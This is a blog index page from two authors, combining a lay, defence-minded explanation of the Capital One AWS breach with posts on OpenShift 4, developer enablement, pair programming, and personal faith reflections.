Author: Josh

What Happened at Capital One?

What Happened at Capital One?

There have been many words written about the Capital One breach – but a lot of them didn’t explain what actually happened. We care a lot about security in general, and cloud security in specific, so Josh set out to find some words that did explain what happened:

The Krebs article might be the best for this. However, as far as we could tell, no one’s tackled it from a “what can enterprises learn from this?” standpoint, and…that’s what we really care about.

TL;DR: The Event

A hacker named Erratic, who was a former AWS employee, took the following actions:

  1. Owned the Web Application Firewall (WAF) on Capital One’s Amazon Web Services (AWS) Virtual Private Cluster (VPC)
  2. Used the credentials of the WAF to connect to other AWS resources in the VPC, including their storage objects (S3 Object Stores)
  3. Synced (copied) the object store to her own storage

“With this one trick, you can get 100M Credit Card Numbers! The secret THEY don’t want you to know!”
– Best ClickBait Ad Ever

ELI5: The Event

So…there’s a lot about the mechanics of this that’s unclear. But we can explain what seems to be widely accepted as fact. First, some definitions:

  • A Web Application Firewall (WAF) is basically an entry point into a system – it isn’t intended to be entry, though, it’s intended to be a layer of defense.
  • AWS is Amazon’s public cloud.
  • A virtual private cluster (VPC) is a cordoned-off part of a cloud – so, it was an area of AWS that was specifically for Capital One.

So…

  1. Somehow the hacker Erratic was able to log in to one of Capital One’s WAF.
  2. From there, she got to their storage objects that represented information about people – specifically, people who had used the business credit card application…application. Overloaded words are the best!
  3. Finally, she copied those storage objects that represented people to her own area of AWS – like copying a file from someone else’s Google Drive into your Google Drive.

Questions Outstanding

…there are a lot.

It’s not clear to how Erratic did #1, logging in to the WAF. The most likely answer is that the username/password was something not complicated enough – like maybe the default of admin/admin. But there are also other possibilities, and if Capital One has disclosed this piece, we couldn’t find it.

There are a few ways step #2 could have happened – the WAF could have already had access to all of the storage objects, or Erratic could have given the WAF direct access to the storage objects. The J Cole Morrison article above explained one possible scenario: Amazon IAM could have been used to take advantage of the fact that she was already in the WAF and then extended the default trust of “well, you’re in the WAF, so okay” – security people call this a “pivot”.

Step #3 is basically…copy/paste. There are probably some interesting nuances here, like…if she didn’t give the WAF authority to read the objects, why did the WAF have the authority? What business use case would require giving an access point read access to an entire store of customer data? Also she would have had to have given something access to write to her own AWS space, at least temporarily.

The Pain: $100M-$150M

The Capital One press release stated that this incident will “generate incremental costs of approximately $100 to $150 million in 2019.” Capital One was one of the earliest companies to go to AWS/the cloud, and they made a lot of noise about it – here, and here. Explaining technology success is one of our favorite things, but there are trade offs if you could otherwise manage to keep your backing infrastructure a secret.

This has lead to egg on AWS’s and Capital One’s faces, which is unfortunate, because this really doesn’t have much to specifically do with AWS or clouds in general….

…or does it?
– Not Intended to be ClickBait

Clouds in General

This isn’t the first AWS data breach (see end of the blog for a list of others). The list is not small, unfortunately.

Please raise your hand if you are sure you haven’t been hacked?

We’re gonna say this is partially because AWS is the biggest, been around the longest, and had to figure out hyperscale stuffs without anyone to copy from because they were the first.

But still… yikes.

A big part of this is that Amazon makes things super easy. So easy a caveman could do it, right? And…that’s the trick. It’s super easy to type in a credit card (or even an AWS gift card, I (Josh) have one they gave out at a trade show) and spin up some storage and compute. Unfortunately, it isn’t super easy to spin up security tailored to clouds.

We used to have to wait for infrastructure teams in our data centers to (hopefully) handle the security for us. They’d put your request in a queue, and get to it a week later…then they’d ask the storage admins and VM admins for some data and some compute, and that request would go into a queue…and then, several steps later, the firewall admins would get involved…but doggone it, eventually the pros would secure things like they were trained.

VM-based infrastructure has been around a long time, and the kinks have been worked out. Cloud infrastructure is newer, and exponentially faster to use – that’s one of the biggest appeals. Unfortunately, because it’s newer and because it’s so fast, kinks still exist – and one of the biggest is how to make it secure without slowing down the people using it.

Clouds are not all insecure, the sky is not falling – but they do require more deliberate attention to security than perhaps we’re used to in most of IT.

Takeaways and Recommendations

With Infrastructure as a Service that’s as fast and easy as cloud-based, it’s clear that there are often times when the right security-aware folks are not involved. It’s extremely easy to get going with platforms like these, which is…kind of the point. Simply put, you can get insecure systems faster and easier than you can get secure systems – for now, anyway. The industry knows this, and is trying to make it better.

Until security catches up to the speed of IaaS, companies need people who can secure their systems to be involved in setting up new platforms, and setting up best practices for their use. The balance point of that is not removing too much of the speed and agility gains of advances like IaaS because of security – ideally security should be something that everyone agrees is worth the trade.

So…after all of that, here are some recommendations:

  1. Single layers of security are not enough. You need Defense in Depth, and vital areas like customer data need to be strongly protected regardless of the platform trying to access them.
  2. Security practices and implementations should be transparent, at least within a company, and questions should be welcomed and encouraged. Open culture helps with security, too.
  3. Security should be automated as much as possible, and that automation should also be transparent (infrastructure as code).
  4. Enterprises need to choose platforms that are secure, that have people dedicated to the security of that platform as their job.

Other AWS Data Breaches

We’re on Hiatus for a bit – but for a REALLY GOOD REASON.

We’re on Hiatus for a bit – but for a REALLY GOOD REASON.

We really love this blog. We started it almost exactly 6 months ago and it means a ton to both of us. We started with two posts a week – and then Josh started a new job. We downshifted to one post a week – and then Laine got a new job. We’ve managed to keep on keepin’ on at one post a week since then, which… well, we really love this blog.

One of the first things we ever did that made us sit up and realize that maybe we made a seriously effective team was give a nerd presentation – we talked about feature toggles as an architectural concept. A few months after that, we went to UberConf in Denver. That was Laine’s first IT conference, and we had a blast. That’s a pretty good “God does stuff everywhere” story, which we should probably tell at some point…

After that conference, as we adjusted back to normal life, we talked about how seriously amazingly cool it would be to give nerd presentations at a nerd conference of that level – national, and with nerd-famous people like Mark Richards and Neal FordJosh definitely fanboy’d when Mark Richards included him in a demo in a presentation. We also befriended one of the speakers on the tour, who lives nowhere near us. We filed away the plan to some day speak at national nerd conferences in general, and at UberConf specifically, in the “haha, sure, that might happen some day” file.

We called this a goal, but…it was a dream. It was a dream in the way that little kids gleefully dream about being an astronaut when they grow up.

Laine was off work for 6 months. Again, another story for another time. But while she was off work, we started to apply to speak at conferences. Josh’s new job was friendly to the idea, Laine had no job, it was something to think about, so…we sort of figured why not.

We applied to speak at O’Reilly’s Open Source & Software Convention (OSCON), who was having a themed Inner Source day this year. Once Laine understood what on Earth “inner source” meant, we were sort of like, “hey it is us and one of the things we love the most!!” We submitted two talks.

We also started conversations about getting onto a No Fluff Just Stuff stop, semi-local – NFJS organizes UberConf along with a lot of other regional conferences, all throughout the year. The other major conference they organize is ArchConf, in December – which was also on our Nerd/Astronaut Dreams Bucket List.

And then, on a Friday afternoon, we found out the following:

  1. One of our talks was accepted for OSCON.
  2. One of the speakers for UberConf had to drop out, there were some spots open, and we could have them if we wanted.
  3. We were officially in for also Tech Leader Summit and ArchConf.

God does weird, wonderful, lavish, unexpectedly awesome stuff

…you mentioned a hiatus?

Yes! We did.

OSCON and UberConf are the same week, the week of July 15th. We got lucky (jklol pretty sure it was God doing more awesome stuff) and our talk at OSCON is that Tuesday, and our talks (4!!) at UberConf are Wednesday and Friday. So…we decided to do both conferences.

J: Should we do both?
L: Are we really crazy enough to try that? :thinking:
Us: Yep!!

We’re getting ready for those talks now. We are both extremely dedicated, prolific workers, but even we have limits. We have several posts in varying stages of done, but the kinds of thing we write require focus and attention and time and soul – and we pretty much only know how to make any content we produce in that same way.

“A man’s got to know his limitations.” – Harry Callahan, Magnum Force

We will be back. We have so many thoughts and feels and did we mention we love this blog?

Logistics

These are the descriptions and scheduling of our talks:

Please come say hello if you’ll be at either OSCON or UberConf. (If you are not attending and would like to, we have discount codes!) We love these topics, we love talking about them, and we are so stupid excited to be doing this.

Also, we will have stickers. We bought binders for them and everything. 

Why Thanos is the Best Avenger

Why Thanos is the Best Avenger

We’re (hopefully) taught some important things as children:

  • you can do anything you set your mind to, so aim high
  • we’re all representatives of humanity, and being part of humanity comes with some responsibilities – vote, take care of the environment, take care of each other, etc
  • do what you think is right, even if all your friends are doing what you think is wrong

[Spoilers ahead, for Avengers: Infinity War and Avengers: Endgame]

Read More Read More

Souls are Like Garages

Souls are Like Garages

On Garages: a Semi-Rant

The box on the lower left is happy, if upside down.

A pet peeve of mine (Josh) is messy garages. I was ranting about this to Laine the other day, and an epiphany hit me.

Souls are like garages. Keep yours cleaned the f&$# out.

We are not naturally highly organized people. This is not a rant/post proposing that you itemize, alphabetize, and categorize every one of your possessions, towards living a better life. This is not that kind of post.

At least this person made an alley through their stuff…

However, your garage is made for a specific purpose. We both live in Michigan. It gets cold here. If you have to park your car on the street, or in your driveway, your car gets covered in frost that has to be scraped off with one of the most annoying tools ever created. It also gets covered in snow when it inevitably snows, and regardless of snow or frost, it’s cold in the mornings.

Your driveway is also the safest place for your friends and buddies to park when they come visit you – but if you have to park in the driveway, they have to park in the street.

If you park in a garage, if you use the garage for its intended purpose, you avoid all of this pain.

Garages are for parking. They shouldn’t be filled with cruft and detritus that you don’t need, you haven’t used in years, and you have no real plans to even think about.

Read More Read More

Quick Hits: Coolest New Stuff In OpenShift 4

Quick Hits: Coolest New Stuff In OpenShift 4

We talked in a previous post about neat stuff that was coming up in OpenShift. We wanted to follow up now that more information is available and 4.1 is GA and quickly break down some of the neatest stuff.

OpenShift 4 is the major version that will bring Kubernetes to being the standard platform: it provides features that let the majority of enterprises build and run the majority of their applications on an open, agile, future-ready platform.

OpenShift 4 crosses the chasm from early adopters to the standard platform for Kubernetes.

Istio (Service Mesh)

What is it: Networking upgrade for OpenShift Applications

Status: Tech Preview as of 4.1

How does it work: Injects a container sidecar to monitor (mostly to say who’s calling who, and how much), secure, and manage traffic. 

Key Features:

  • Transaction tracing, traffic graphs, full-transaction performance monitoring
  • Traffic (outing) control 
  • Rate limiting, circuit breaking

Big Talking Point: OpenShift Service Mesh makes managing all of the services you’re building visual and clear
Business Use Case: Enterprises looking to get visibility into their microservices, AppDynamics and Dynatrace customers.

Red Hat Code Ready

What is it: Containerized Application Development Environment. Tagline is  “cloud-native development.”

Key Features:

  • Single-Click Modern IDE
  • Tight integration with OpenShift
  • Debugging containers on OpenShift is a nice experience

Business Use Case:  Enterprises with poor developer IDES will appreciate CodeReady.

Competitors:  IntelliJ and VSCode

FaaS 

What is it: FaaS/Serverless is an even easier, and more restricted architecture than containers or PaaS. 

Serverless is an alternative to containers. Applications that would be a good fit in a simple container are an easy fit for serverless.

 

Knative

What is it: Kubernetes-based serverless “Application Easy Button” – just write code, forget about packaging. We talked about it in more detail here.

Key Features:

  • An open standard for serverless.
  • Build, scale, and trigger applications automatically
    Big Talking Point: Openshift 4’s Knative solution makes building, running, scaling, and starting applications even simpler.
    Business Use Case: Enterprises looking to turn their long-running (overnight) batch streams into real-time integrations should use Knative and AMQ streams on OCP

Competitors: AWS Lambda, Azure Serverless, Google Cloud Functions. K-Native provides this functionality without vendor lock-in from a single cloud provider.

The Operator Framework

What is it: intelligent automation that can manage an application by defining proper state and automate complicated application operations that using best practices.

Key Features:

  • Kubernetes-native application management
  • Choice of automation: Go, Ansible, Helm
  • Packaged with a Kubernetes application

Business Use Case: managing stateful applications like Kafka and databases, however new use cases show up all the time, such as managing the kubernetes cluster itself (Machine Operators)

Big Talking Point: Operators make managing complex applications in Kubernetes much easier, turning industry-standard practices into automation.

KubeVirt

What is it: Kubernetes-native virtualization. Run VMs on Kubernetes. Basically, this is VMWare for K8s.

How does it work: leverage open source virtualization technology inside a container to run VMs. 

Features: 

  • Run Windows or Linux containers on OpenShift
  • Manage complicated, hard-to-containerize applications alongside the  containerized applications that integrate with them

Business Use Case: ditch proprietary VM platforms and run you containers and VMs on one standard, open platform

What else is neat in OpenShift 4

Cluster Admin is so much easier: 

  • Fully-automated cluster spin-up: AWS install in less than an hour
  • Push-button updates
  • Immutable Infrastructure: RHEL CoreOS are immutable and extremely strong from a security standpoint
  • Nodes as pets: automatic scaling and healing
  • Cluster can automatically add nodes as load increases

Stuff We’d Like to Get Deeper With

Theres’s a lot more coming with OpenShift that we’d like to get hands-on time with:

  • Windows Containers
  • OpenShift Cluster Management at cloud.redhat.com
  • Universal Base Image: https://www.redhat.com/en/blog/introducing-red-hat-universal-base-image
  • Quay and Clair

OpenShift: Still the Best at What it Always was Best At

 

 

 


OpenShift is still the platform we know and love.

  • Secure Kubernetes:  SELinux preventing security problems like the runc vulnerability
  • Fully backed by Red hat, which will be even more stable and well-funded after the IBM acquisition
  • Enabling Digital Transformation: Containers are still the best way to transform IT, and Kubernetes is the best way to enable DevOps and Continuous Delivery
  • Open Hybrid Strategy: Vendor Lock-in sucks. Open standards and great partnerships.

It was recently announced that more than 1000 enterprises across all industries are running OpenShift. 

Sacrifice Done Well

Sacrifice Done Well

“I am the good shepherd. The good shepherd lays down his life for the sheep.” John 10:11

The Bible talks about sacrifice a lot. Sacrificing for each other, sacrificing to serve God. The Gospel, the most important story arc in the Bible, is in part about Jesus’ ultimate sacrifice – his death, yes, but more his complete and utter separation from God when he needed God the most. Unfortunately, over the past 2000 years, the definition of sacrifice has been broken to the point where it’s used to do more harm than good.

Read More Read More

Creating Monsters and Utopias

Creating Monsters and Utopias

I’m not the bad guy. Right??

There’s a relatively simple list of things that most people want. We want to feel important to our world. We want to be good, kind people – people who aren’t the bad guy, people who deserve good.

We want the freedom to choose what makes us happy, and to find things that make us feel fulfilled. We want to be able to choose the things that fill our souls to the brim.

Conflict

But the people around us don’t always want those things for us. They want us to work in their best interests, and they sometimes get hurt when we instead do what we want or need. When they get hurt, they try to control us into changing. They try to make us feel bad (or good) until we do change, until we do things that don’t make us happy or things that will hurt us – and if that doesn’t work, they decide that we must be an enemy and they begin to treat us accordingly.

Resolution

False Realities

I (Josh) didn’t like reality. Reality kept showing me that people may not always react favorably to the things I want or need – and I was scared of what might happen if I continued to fight for my right to those things. Ultimately, I was scared that they might leave if I continued to take care of myself.

I didn’t value my own soul enough to believe that it was worth taking care of, except…I kind of did. So in response, as a way to feel justified in fighting for my soul, I created alternate versions of people. I made people into monsters – monsters who manipulated me for their own selfish purposes. I saw them as willing to destroy me in order to get what they wanted. And since they were evil, I didn’t have to do what they said – I had the right to take care of myself, and I also had the right to control them into being not evil.

False Realities Believe in the Right to Protect Myself

Some of these people were not trying to manipulate me. I would see people as evil who were just trying to help me face my fears – deeply hidden, pressed down, and blocked away – and I would see people as evil who would shove me at God when I didn’t want to do that.

But…some of the people I turned into monsters were trying to manipulate me. These people weren’t evil though, they were just…afraid. They were afraid of the same thing I was, actually, that if they couldn’t control me or our relationship, I would leave. In their fear, they were trying to destroy me, but sort of as a…byproduct. They tried to destroy me to make me safe for them to love.

What I struggled with was the simple fact that I’m supposed to do what protects my soul, what nourishes and cares for it, and what keeps it whole so that it can serve God to the best of its ability. I don’t actually need to see evil motives in other people in order to do so.

I don’t need to see evil motives in other people in order to protect my soul.

Three Realities

“Hopeless.”

I realized that I believed in at least three realities:

  1. the utopia, a perfect place, without fear or risk, that I had long ago lost all hope of getting to. I was angry at God, because I assumed he was choosing to keep me away- so really it was his fault that I couldn’t get there.
  2. the horror, where the people I loved were evil and trying to destroy me, and where nothing would ever ever be good – where not even God could fix things.
  3. actual reality, where things were mostly good, but not my previous understanding of ideal.

If life was intended to be the utopia, then I had seriously messed something up at some point, despite always trying as hard I could to do and be what God wanted from me. If life was the horror, I thought I could (and should) seize control from God and set my own destiny – but it turns out that seizing control from God never works. I tried, and tried, and tried with all my soul and strength to take control and make the horror world less awful. It was a terrible process, but I realized, eventually, that it was impossible. Also, thankfully, that it wasn’t even reality.

That left only actual reality – and if actual reality was all that was available for me to work with, I was really scared that my life would never be what I wanted it to be.

Oh good, not just me then…

We realized that other people do this too – we saw it happening, we had it happen to us as the objects, and we were confused and hurt when people saw us as demons or monsters out to destroy them. But…then we realized that these people were just really scared. They wanted to control us into doing the things that would make them feel less scared – which we weren’t willing to do. The inability to control us made them more scared, which led to more attempts at control, and…

Scared people do crazy things.

It gave us a lot of new empathy actually. We realized that most of the people who ever did a bad thing to another person…they probably just created a false reality. Every mugger was just keeping himself fed and giving himself the life he deserved – it was only fair, only what he deserved from the people and world around him. Every despot was just preserving freedom or safety for his people – whatever meager amount could be eked out from this cold, dark world. “Because even meager safety in my kingdom is better than the horror of living under their regime.”

At this point, we’re pretty sure that even truly evil people create their own moral justification via false realities. Hitler believed in what he was doing so hard that he convinced thousands of people that he was right – his opinions were awful, and fueled by fear. But he was convincing. He was sure.

Scared people do crazy things.

What’s the answer?

What’s always the answer?

Faith. Trust.

I had to learn all over again how to trust. I had to trust that God loves me – and while he disciplines, he does not punish. I have already been forgiven, so…there isn’t anything to punish.

I had to be willing to see the people I loved, which I had been avoiding in case I was about to see them walk away from me. Once I saw them, I knew that they were not trying to destroy me – or if they were, I didn’t have to let them.

Once I could trust God, and remember that he loves me and wasn’t trying to punish me, it was clear(er) that the utopia probably didn’t exist. And once I could see the people I loved again, and I trusted that they were not trying to destroy me, it was clear(er) that the horror probably didn’t exist either. That left learning how to exist in actual reality, which…is an entirely other blog post.

Developers Drive Organizational Success

Developers Drive Organizational Success

Developers are a huge part of organizational success. Way back in 2013, Stephen O’Grady said that developers are “kingmakers” – so this idea is not new.

As a society, we’re increasingly connected – to each other, and to the businesses we choose. Those connections, and those businesses, run on software. We’ve moved to hitting a website or using an app to do business instead of picking up the phone – and even if we call a company, the person we’re talking to is definitely using software on our behalf.

Pikachu, I choose YOU.

We said that we’re more connected to the businesses we choose – and we do have significantly more choice about which businesses we use. The business’s software is part of how we make that choice – if it’s engaging and easy to understand and use, then working with the business as a customer is easier. If working with a company is easier, we’re more likely to go back. If, on the other hand, the website or app doesn’t work, or it’s confusing, we’re more likely to use one of the many alternatives that the internet allows for. Basically…

Customer service is characterized, facilitated, and proven by a company’s software.

Software driving a business’s success is also not a new idea – in fact, it’s the core concept behind the ideas of digital transformation and digital disruption. If we accept that it’s true, the next thing to consider is how to make software successful.

Software’s success is determined by how well it’s designed, built, and maintained. Great software can’t be built by mediocre developers using mediocre architecture, running on and designed for mediocre platforms. So…that means that businesses really need to know, “how do we enable our people to create amazing and engaging software?”

Software drives a business’s success – and software’s success is driven by how well it’s designed, built, and maintained.

How to Enable Developers – Technology

Enabling via Architecture

What do developers need to be successful? Well…they need several things, but first they need to understand the rules of the software they’re building: what is it intended to do? How does it communicate with other software? What APIs, services are available? Where is data permanently stored? What languages can I write it in?

These questions are all architecture. The answers should be clear and consistent, and they should allow for flexibility in implementation. They should also allow for development speed and developer familiarity – usually by using modern, standard technology with lots of community support.

Open source technology is usually the best for enabling happy developers. The communities around open source development are strong, and they’re full of skilled, passionate people who love the technology they’re contributing to – and they contribute to technology that they would love to use. Spring (Java framework), NodeJS (JavaScript run time environment), Ruby (general purpose, object-oriented programming language, like C++ and Java), MongoDB (document database), and Kafka (pub/sub messaging) are all examples of great open source architecture ingredients that developers actually like to use.

Enabling via Tools

Developers need to know what tools are at their disposal to develop, test, and run their software. They also need those tools to be kept up to date – via updates, or via new tools that accomplish what they need better, faster, or less painfully.

They need an IDE they understand – and enjoy using (we like IntelliJ, but nerd tools are something like holy flame wars, so…you do you. Laine quite happily made entire web pages in Notepad++ as a teenager, soooo…). Think about your office, or the primary tool you use to do your job – that’s an IDE for a developer. It needs to be comfortable.

They need code repositories (Git-based, Bitbucket is great), and security scanning (Sonarqube, and a dependency scanner), and test automation, ideally built in as early in the process of development as possible. They need fast build tools so they aren’t forced to stop everything and wait in order to even see if a change works (Maven, or Gradle), and automation where and how it makes sense, for builds, or deployment, or…whatever (Jenkins, or Ansible).

They need a good platform on which to run their software, ideally one that gives them the ability to self-serve…well, servers, so they don’t have to wait a week or a month or even a day to move forward once their code is ready (OpenShift).

Enabling Developers – Culture

Enabling via Processes

Confusing release processes, slow purchase processes, unclear approval processes for free tools – these are all processes that choke innovation, and worse, choke a developer’s ability to even execute. To enable developers, a business actually wants them to have some freedom to stretch out – to use their skills, and to discover new skills.

Independent of IT processes, there are also HR processes – like rules that dictate many hours must be worked, or rules that don’t “count” any work done from anywhere other than on site. IT is an art, not a formula – IT brains are constantly designing and adapting and connecting information – and then refining those designs, adaptations, and connections. Expecting, and behaving as though, X developers = Y lines of code, and Y lines of code = Z business priorities delivered causes pain and actually slows developers down.

IT is an art, not a formula.

So…there are bad processes that, if stopped or lessened or sometimes just explained will enable developers. There are also good processes – giving them a comfortable means to communicate with each other (Slack! <3), or encouraging easy ways to learn and grow and try things without repercussions.

Enabling via Support

Application developers need support – people backing them up and fighting for them, and supporting the tools they need to do their jobs in the least painful way possible. They need Architects setting architecture standards, and making sure that people talk to each other and agree about how all of the software into, out of, and within a company will interact. They need Platform Architects (sometimes called Enterprise Architects or Infrastructure Architects) setting up their platforms and making sure their apps run, and giving them access to get clear, fast feedback about their applications from those platforms.

They need people who will cut through any cultural red tape to get them the information and tools and good processes that they need. They need HR managers who support their career and their personal and professional growth. They need technical leadership who teach and advocate – new architecture patterns, how to actually use new tools, what works and definitely does NOT work between teams and in other companies. They need people explaining how to use the tools provided and giving them permission to adapt the “how” in such a way that the tool is not onerous.

They also need each other people who are native speakers of their language, who are trying to accomplish roughly the same things in the same ways with the same barriers.

Teams Drive Organizational Success

Developers drive organizational success, but they need teams around them – supporting them, and fighting for the processes and tools that will help them be successful.

A healthy ecosystem is vitally important to developer success.

So…it isn’t actually just developers who drive organizational success – it’s teams. Teams centered around development, and enabling that development, but…definitely teams.

Successful businesses have successful software. Successful software is made by enabled developers. However, the truth of the matter is that because we are all so connected, no one exists in a vacuum. Developers need architects, and infrastructure people, and leadership (HR and technical, along with vision setters and vision communicators), and cutters of red tape, and purchasers of tools, and each other to truly be successful.

Our Pair Programming Experience – or, the first time we nerded out together and learned a ton

Our Pair Programming Experience – or, the first time we nerded out together and learned a ton

Pair Programming – What is?

Pair programming is an agile software development technique in which two programmers work together at one workstation. One, the driver, writes code while the other, the observer or navigator, reviews each line of code as it is typed in. The two programmers switch roles frequently. (Wikipedia)

Why explain our experience?

At the end of 2017, we were both OpenShift Architects at our last employer. We were working on integrating the new-to-us platform with the existing processes of the organization – especially the build, deployment, and release processes. Most of the applications on OpenShift would be Java applications, and all Java builds were done with Jenkins. There was a release management tool that was written in-house serving as a middle layer to control deployments and releases.

Build and deployment when we started, mostly to WebSphere on a mainframe or WebSphere on distributed VM’s.

We (the organization) were also in the middle of transitioning from enterprise Jenkins + templates to open source Jenkins + pipelines. There were only a handful of people in the very large IT division who even knew how to write a pipeline – and we took on writing the pipelines (and shared libraries) that would prove out a default implementation of building and releasing to OpenShift. We knew this would be a huge challenge – if done properly, the entire company could run their OpenShift deploys on this pipeline, and it could be improved and grown as more people contributed to it via the internal open source culture that we were building.

While we figured out what to do, the pipeline just went straight from (the new, open source version of) Jenkins to OpenShift. POC FTW!

We ended up doing this via pair programming – because we work really well together, mostly. However, because we’re both technology nerds and also people/culture nerds, and because pair programming has some push-back from more traditional organizations, we wrote down the benefits we saw.

I know some stuff, and you know some stuff, but basically we’re both noobs…

We were BOTH the little turtle…

The team Laine was assigned to was the team that oversaw Jenkins administration and the build process, along with the in-house release management tool – but she’d only been on that team for about 4 months. She knew more about Jenkins than Josh, but….not by much.

Josh was the one who spearheaded bringing OpenShift into the company, and so he knew a lot of the theory of automating OpenShift deploys and had a rough idea of what the process as a whole should look like.

…basically, neither of us really knew how to do what we set out to do, and actually we didn’t intend to do something that fell into the realm of pair programming. We just already relied on each other for many things, including understanding and processing information, and we both deeply loved OpenShift and saw its potential for the company we also loved. We were determined to do as much as we possibly could to help it be successful.

What We Actually Did

Mostly our plan was to just…try stuff. We followed the definition of pair programming above some of the time – we took turns writing while the other focused more on review, catching problems, and planning the next steps. This was awesome, because we caught problems early just by keeping an eye on each other’s work – like, “uhh, you spelled ‘deploy’ D-E-P-L-Y, that’s not gonna’ work…”

Taking turns doing the actual coding also allowed us to churn through research while still doing development. We’re both top-down thinkers, which means that we understood the steps that needed to happen without knowing quite how we would implement each step. With one of us researching while the other was coding, as soon as one coding task was complete, we could more or less start right away on the next. Given the amount of research we had to do, this was huge in speeding us up. It also allowed us to switch up what we were each doing, and not get bogged down in either research or implementation.

Why is Heath Ledger Joker on this? IDK, who cares?? <3

In addition to taking turns coding vs overseeing, we also did a lot of what might be called parallel programming – we worked closely on different aspects of the same problem at the same time. This was also highly effective, but it required us to be very much on the same page about what we were doing. We did this mostly off-hours, via Slack communication, so…it wasn’t always a given that we actually were on the same page.

Despite the communication hijinks, or maybe because of them (it was really funny…), this was probably the most efficient of all of the coding work we did. If we got stuck or didn’t know how to solve a problem, the other could easily figure out how to help because we were already in the code. We also bounced questions and implementation ideas off of each other (efficiently, because we didn’t need to explain the entire project!), so…something like pair solution design.

And again, up there in overall efficiency, was some pair debugging. We could put our heads together to talk through what was broken (aside from typos…), figure out why it was broken, and land more quickly at the right solution to fix it. (See also: Rubber Duck Debugging)

This is where we landed after we did our part. We advised on tweaking the process, helped implement updates where we could, and…got out of the way and let the very talented and enthusiastic contributing developers take over.

Why it was Awesome

(Quotes in this section are from Strengthening the Case for Pair Programming.)

More Efficient

Two heads are better than one. Often, the part of development that takes the longest or is the most complicated isn’t writing the code  it’s figuring out what to do, and then figuring out what you did to break it and how to fix it.

Having a person there who understands the project as well as you do can speed up…well, literally all of that.

Higher Quality

…virtually all the surveyed professional programmers stated that they were more confident in their solutions when they pair programmed.

Pair programming provides better quality, hands down. We talked about this some already – a pair programmer can catch bugs before compiling or unit tests can, and they can catch bugs all the way from a typo to an architecture or design problem. Pair programming also requires by its very nature discussing all decisions – both design and implementation, at least at a high level.

…basically, you end up with an application where there’s been a design and code review for literally every aspect of the application.

Resilient Programming FTW (or, You Can Still Make Progress Even when Your Computer Dies)

We both had some laptop issues in all of this – Laine had some battery issues, and Josh had his laptop start a virus scan (slowing his computer to the point of being unusable) while he was trying to code. We got on Slack and helped the one who still had a working laptop, rather than that time just…being wasted.

Relationships, and Joy

…more than 90% stated that they enjoyed collaborative programming more than solo programming.

Best nerd celebration emoji.

Laughing at mistakes, getting encouragement (or trolling) when we did dumb stuff, nerd emoji celebration when something went well – all of these were better because we were working together.

It was just…fun. There was joy in all of it, in both the successes and the failures. And there was joy in the shared purpose of setting something that we loved up for success.

When making a pair…

There are a few things we learned that were vital to pair programming going well for us. We think that the following pieces are the most important to a successful pairing:

Trust

Without trust, you lose some of the benefit of pointing out mistakes and instead spend the time you’d gain making sure that feelings aren’t hurt. Based on our experience, we actually think that this one is the most important key to success.

Temperament

You’ll want to find someone with approximately the same temperament and, uh…bossy-ness. We went with Bossy-ness Level: Maximum, but you do you. We both push for what we think is the right solution, and we kind of enjoy arguing with each other to figure out whose solution really is right. If either of us had paired with someone who was uncomfortable with conflict, chances are it…wouldn’t have gone well.

Technical Level/Skill/Experience

Pair programming probably isn’t going to work very well with a brand new associate paired up with someone who’s been in the industry for 10 years. That’s a lot of context to explain, so while this set up is amazing for training purposes, it isn’t the most effective for software delivery.

Lack of Knowledge

Look for someone who knows something you don’t about what you’re trying to accomplish. Laine knew Jenkins and is a Google savant, and Josh knew the OpenShift theory and reads constantly – when automating releases to OpenShift, it was a good combination.

And Finally

Pair programming provides a ton of value. It speeds up development, catches bugs sooner, and aids dramatically in design and implementation. It’s also fun, which is important and sometimes forgotten about in the just deliver more world of IT.

We loved working together on this, which led to much joy in learning the deep knowledge necessary to build a pipeline the whole company could use. And, even better, it worked – teams that joined OpenShift used and improved upon what we did, and those teams implemented continuous delivery on OpenShift. We’re both very sure that we never have been that successful if we hadn’t paired up on it.

There’s No Absence of Fear

There’s No Absence of Fear

I used to think there was an emotional state of “no fear.” Entirely unafraid, about all things, all the time. I thought this was a real, legitimate place I should be trying to get to.

Laine (and God (L: it was mostly God…)) corrected me.

There are always new sources of fear. This world is broken. The people living here are broken. Things go wrong. Our dreams fail, and our hopes die. Our relationships can break, our jobs can suck, people can hurt us. We make choices and the people we love make choices, and it doesn’t always seem like it could possibly work out.

Read More Read More